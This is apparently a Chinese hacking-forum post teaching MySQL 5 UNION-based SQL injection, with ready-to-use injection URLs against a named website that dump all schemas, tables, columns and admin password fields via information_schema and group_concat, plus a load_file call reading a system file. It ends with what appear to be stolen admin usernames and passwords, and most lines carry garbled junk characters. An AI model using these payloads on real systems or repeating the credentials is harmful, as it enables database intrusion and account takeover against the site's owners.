此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似( _4 d0 M! s; W6 [' L% O
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
9 z2 E" y+ F; [
~3 n& Q2 ^" M7 u$ g& w: V- E
& z0 E2 o* @4 g3 ?( {' n: W+ q# E优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
4 m2 Q' i; z* f. a- j: ?/ l7 L9 p) P. D5 l* K/ `5 d3 ^1 E1 r
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...( i+ i; g4 Q' U7 d2 s$ w! \
" s* ^1 [0 V: |7 i( R4 l3 ^/ o$ X; J# h
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示0 V% U& G! ]1 F7 X+ U$ @
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
: c" x, F9 o. R3 l6 R3 y9 F% p- Z
0 U5 r( y% B# f2 Z: y" W3 Phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,174 Z6 N+ c9 I7 P6 q
" [: ?5 l6 D1 @; B
读出所有库:, Y/ f( j& l$ l; ?) s: [
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA9 i% Q9 [% m( ~. t
2 t: k6 C/ R1 w: c3 O3 U. R
1 E1 z a, @3 Q2 X: m
- ^7 z8 p9 s5 u9 B, [读出所有表:; I& x5 H* x, z* W& j ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()# N2 y* n6 W$ W6 x! w3 ^
( ^' ^2 x/ T, P; T) z读出所有表字段:% ~) F" i0 f& n5 F
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)! {/ V7 z9 @& p/ @
*/ (97,100,109,105,110)为admin的ascii码 依次类推
" D7 j5 [5 l3 A% A- d, [4 `, d1 M* ? t3 |2 t
读出所有表字段里的内容:
+ j- d* X, _4 _1 i* zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
. G7 U2 q3 z# @! H9 ~- B% s9 u! Z4 T" x+ t4 C9 N6 p1 L( D
4 w" f' {) ^2 q
! Z% l! k" m% }# R/ {
+ T% |+ M$ w4 v; ~. V6 a5 @- l6 O" Q V9 l3 x! g
; M# y, o9 E5 I' c; |# f( }http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
4 N0 ]) m1 A! Y5 k$ P. t* ?, g3 d+ t' Q5 W; L+ [5 Z9 m; C
, G9 h* D; ^, u8 M& g8 S
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23% J: F& [1 s+ R: q4 Q
4 b& F6 {( g3 z2 j4 `; ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
( z* S7 u4 D; Y j5 E5 B( m# {# J9 X: u: g5 N5 h/ L( D1 p
6 v$ p6 f; I j0 {! ^2 p! |
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23) `' A6 o" W# |% V
* V; A" `! i/ c3 U: O
7 g/ H7 z5 ^/ `& c4 Q& u webmaster:dzb521123,simlab:simadmin20043233
' _" q3 ^- z0 f- | |
发表于 2012-9-13 16:37:34
收藏
支持
反对